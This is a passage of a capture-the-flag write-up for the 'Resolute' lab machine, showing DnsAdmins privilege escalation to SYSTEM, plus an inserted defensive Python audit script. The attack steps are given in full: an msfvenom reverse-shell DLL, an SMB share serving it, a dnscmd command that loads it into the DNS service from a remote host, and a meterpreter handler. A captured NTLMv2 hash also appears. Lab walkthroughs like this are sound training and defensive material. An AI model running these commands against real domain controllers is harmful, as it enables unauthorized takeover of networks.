Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\ryan\Documents>
```
Looking at this line, ryan is part of the DnsAdmins group. This group is prone to a privilege escalation vulnerability which allows any user inside it to make the DNS service load an arbitrary, correctly constructed DLL.

```bash
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
```
With the help of this article and this one we can get administrator from DNS.
Creating malicious DLL
We know that the machine has anti-virus, so I can’t drop a malicious file on it to get a reverse shell. So I tried to use impacket-smbserver to serve my dll file from my own operating system and bypass the AV protection. First I created a dll file with msfvenom:

```bash
root in htb/boxes/Resolute ❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.187 LPORT=9001 -a x64 -f dll > main.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes

root in htb/boxes/Resolute 12s ❯
```
Next I set up impacket-smbserver in the path where my dll is located.

```bash
root in htb/boxes/Resolute ❯ python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/htb/boxes/Resolute
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
Setup Impacket-smbserver
Next I load my dll file into the serverlevelplugindll entry on the box:

```bash
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.187\SHARE\main.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents>
```
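Two facts made this step possible: ryan’s DnsAdmins membership, and a `serverlevelplugindll` value that points at a UNC path on another host. Both are things an audit can catch. The Python below is an added example of mine (not from the writeup or the linked articles): it parses the `whoami /all` group table shown earlier for memberships in high-privilege groups and classifies a plugin-DLL value the way a configuration review would. The `whoami` sample is constructed from the output above, and the list of watched groups is my own selection.

```python
import re

# Constructed sample trimmed from the `whoami /all` output shown in this post.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                               Type             SID                                            Attributes
======================================== ================ ============================================== ==================================================================
Everyone                                 Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                            Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users          Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                     Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                       Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level   Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------
"""

# One row of the GROUP INFORMATION table: name, type, SID (attributes are ignored).
GROUP_LINE = re.compile(
    r"^(?P<name>\S.*?)\s{2,}(?P<type>Well-known group|Alias|Group|Label)\s+(?P<sid>S-[\d-]+)"
)

# Groups whose membership is admin-equivalent or one step from it. My own watch list,
# not something the writeup enumerates; extend it for your environment.
WATCHED_GROUPS = {
    "dnsadmins", "domain admins", "enterprise admins", "schema admins",
    "administrators", "backup operators", "account operators",
    "server operators", "print operators",
}


def parse_groups(whoami_text):
    """Return {group name: SID} from the GROUP INFORMATION table of `whoami /all`."""
    groups = {}
    in_section = False
    for line in whoami_text.splitlines():
        if line.strip() == "GROUP INFORMATION":
            in_section = True
            continue
        if in_section and line.strip().endswith("INFORMATION"):
            break  # reached the next section
        if in_section:
            m = GROUP_LINE.match(line)
            if m:
                groups[m.group("name")] = m.group("sid")
    return groups


def privileged_groups(groups):
    """Group names (from parse_groups) whose bare name is on the watch list."""
    return [name for name in groups if name.split("\\")[-1].lower() in WATCHED_GROUPS]


def assess_plugin_dll(value):
    """Classify a DNS ServerLevelPluginDll value as a configuration audit would."""
    if not value or not value.strip():
        return "ok: no server-level plugin DLL is configured"
    v = value.strip().lower()
    if v.startswith("\\\\"):
        return "critical: plugin DLL is loaded from a UNC path, i.e. from another host"
    if not v.startswith("c:\\windows\\system32\\dns\\"):
        return "high: plugin DLL lives outside the DNS server directory"
    return "review: plugin DLL configured; confirm it is an approved, signed module"


if __name__ == "__main__":
    hits = privileged_groups(parse_groups(SAMPLE_WHOAMI))
    print("privileged memberships:", hits or "none")
    print(assess_plugin_dll(r"\\10.10.14.187\SHARE\main.dll"))
```

On a real host the value to feed `assess_plugin_dll` comes from the DNS service parameters in the registry (or from `dnscmd /info /serverlevelplugindll`); an empty result is the expected state on a server that does not use plugins, and anything else deserves a ticket.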
To make sure the machine can reach my share, we can check it with this command:

```bash
*Evil-WinRM* PS C:\Users\ryan\Documents> dir \\10.10.14.187\SHARE


    Directory: \\10.10.14.187\SHARE


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       5/30/2020   4:36 PM             12 password.txt
-a----       5/31/2020   5:13 AM           5120 main.dll
-a----       5/30/2020   4:03 PM           3512 nmap-Resolute
-a----       5/30/2020   4:32 PM            154 users.txt
-a----       5/30/2020   7:51 PM          59392 nc.exe
-a----       5/30/2020   5:18 PM         241664 winPEAS.exe


*Evil-WinRM* PS C:\Users\ryan\Documents>
```
Success! The machine connected to my operating system and can list the files in the path I set as SHARE; my impacket-smbserver is also responding.

```bash
root in htb/boxes/Resolute ❯ python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/htb/boxes/Resolute
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,59611)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
[*] User RESOLUTE\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:SHARE)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,59611)
[*] Remaining connections []
[*] Incoming connection (10.10.10.169,59760)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:6bf4545d80d2f13607b0c9d3f91bd604:010100000000000080adb2044837d601ec836f15824f4098000000000100100078005700710051006a0067004a004f000300100078005700710051006a0067004a004f00020010006b00540075006600480053004f006c00040010006b00540075006600480053004f006c000700080080adb2044837d60106000400020000000800300030000000000000000000000000400000318efa794fd558b74c119e534800bb85deca03c294098a118af41f41a36559c40a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100380037000000000000000000
[*] Disconnecting Share(1:SHARE)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,59760)
[*] Remaining connections []
```
Now let’s run metasploit with a meterpreter handler and start listening.
Setup Meterpreter session

```bash
root in htb/boxes/Resolute ❯ msfconsole
[!] The following modules could not be loaded!../
[!] /root/.msf4/modules/exploits/cgi/webapps/wordpress_userpro.rb
[!] Please see /root/.msf4/logs/framework.log for details.

       =[ metasploit v5.0.87-dev                          ]
+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: When in a module, use back to go back to the top level prompt

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.187
LHOST => 10.10.14.187
msf5 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.187:9001
```
Everything is set up now, so I will do the exploitation: I load my dll file again.

```bash
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.187\SHARE\main.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents>
```
Based on the article I will stop and start the dns service; this will load my dll file and give me a meterpreter shell.

```bash
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents>
```
Then start the dns service:

```bash
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1144
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents>
```
And finally I got an Administrator shell!

```bash
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.187:9001
[*] Sending stage (201283 bytes) to 10.10.10.169
[*] Meterpreter session 1 opened (10.10.14.187:9001 -> 10.10.10.169:59761) at 2020-05-31 20:35:54 +0800

meterpreter >
```

```bash
meterpreter > sysinfo
Computer        : RESOLUTE
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : MEGABANK
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```
Get the root.txt
So let’s pop a shell and get root.txt:

```bash
meterpreter > shell
Process 1596 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```
```bash
C:\Users>cd Administrator/Desktop
cd Administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 923F-3611

 Directory of C:\Users\Administrator\Desktop

12/04/2019  06:18 AM    <DIR>          .
12/04/2019  06:18 AM    <DIR>          ..
12/03/2019  08:32 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,837,903,360 bytes free

C:\Users\Administrator\Desktop>Get-Content "root.txt" | Measure-Object -Character -Word
Get-Content "root.txt" | Measure-Object -Character -Word
'Get-Content' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\Desktop> Get-Content "root.txt" | Measure-Object -Character -Word
Get-Content "root.txt" | Measure-Object -Character -Word

Lines Words Characters Property
----- ----- ---------- --------
          1         32


PS C:\Users\Administrator\Desktop>
```
If you liked my writeup please leave a respect on my Profile
References:
Abusing DNSAdmins privilege for escalation in Active Directory
From DnsAdmins to SYSTEM to Domain Compromise
Transferring Files from Linux to Windows (post-exploitation)